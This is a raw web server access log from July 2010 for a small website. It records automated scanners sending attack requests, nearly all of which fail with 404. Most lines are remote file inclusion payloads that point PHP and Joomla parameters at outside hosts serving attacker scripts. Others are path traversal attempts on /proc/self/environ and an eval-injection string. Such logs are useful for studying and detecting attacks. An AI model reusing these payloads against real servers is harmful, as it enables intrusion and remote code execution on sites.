87.229.26.132 - - [24/Jul/2010:03:50:05 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/plit/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:50:25 -0700] "GET /delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:50:25 -0700] "GET /logs/access_100605.log%20%20//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:50:25 -0700] "GET /logs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:50:28 -0700] "GET /logs/access_100515.log%20%20//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:51:42 -0700] "GET /delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:51:42 -0700] "GET /logs//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:51:42 -0700] "GET /logs/access_100605.log%20%20//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:51:44 -0700] "GET /logs/access_100515.log%20%20//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:52:10 -0700] "GET /phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:52:10 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:52:10 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:52:34 -0700] "GET /logs/access_100612.log/phphtml.php?htmlclass_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:03:52:43 -0700] "GET /logs/access_100710.log/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:03:52:43 -0700] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:03:52:44 -0700] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:03:53:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:03:53:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
222.122.158.94 - - [24/Jul/2010:03:53:17 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:54:16 -0700] "GET /logs/access_100417.log//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:03:54:43 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:57:18 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:57:18 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:57:18 -0700] "GET /logs/access_100619.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:03:58:12 -0700] "GET /logs/access_100529.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:03:58:30 -0700] "GET /logs/access_100417.log//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:04:00:06 -0700] "GET /logs/access_100605.log//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:04:00:12 -0700] "GET /logs/access_100515.log//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:04:02:51 -0700] "GET /logs/access_100605.log//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
203.147.62.92 - - [24/Jul/2010:04:02:52 -0700] "GET /logs/access_100515.log//delete_comment.php?board_skin_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:03:06 -0700] "GET /logs/access_100417.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:15 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:03:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
212.154.246.147 - - [24/Jul/2010:04:04:11 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
212.154.246.147 - - [24/Jul/2010:04:04:13 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:04:05:11 -0700] "GET /logs/access_100529.log/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:04:05:12 -0700] "GET /index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:04:05:13 -0700] "GET /logs/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
121.78.118.123 - - [24/Jul/2010:04:05:13 -0700] "GET /logs/access_100522.log/index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
212.154.246.147 - - [24/Jul/2010:04:05:15 -0700] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
212.154.246.147 - - [24/Jul/2010:04:05:15 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:05:58 -0700] "GET /logs/access_100529.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:05:58 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:05:58 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:06:04 -0700] "GET /logs/access_100508.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
89.149.244.89 - - [24/Jul/2010:04:06:16 -0700] "GET /logs/access_100327.log HTTP/1.0" 200 1835008 "http://www.getyourselfahorse.com/logs/access_100327.log" "Opera/9.00 (Windows NT 4.0; U; en)" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:09:34 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:09:34 -0700] "GET /logs/access_100320.log%20%20//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:09:34 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:09:54 -0700] "GET /logs/access_100417.log%20%20//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:24 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:24 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:25 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:32 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:32 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:33 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:33 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:34 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:34 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:46 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:46 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:46 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:48 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:49 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:50 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:52 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:52 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:52 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:54 -0700] "GET /logs/access_100710.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:54 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:54 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:57 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:57 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:58 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:10:58 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:10:59 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:11:07 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:11:17 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:11:27 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:11:28 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:11:29 -0700] "GET /logs/access_100710.log/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:11:30 -0700] "GET /index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:11:30 -0700] "GET /logs/index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:07 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:07 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:07 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:07 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:07 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:07 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:09 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:09 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:09 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:21 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:22 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
72.55.153.180 - - [24/Jul/2010:04:12:23 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:04:12:40 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
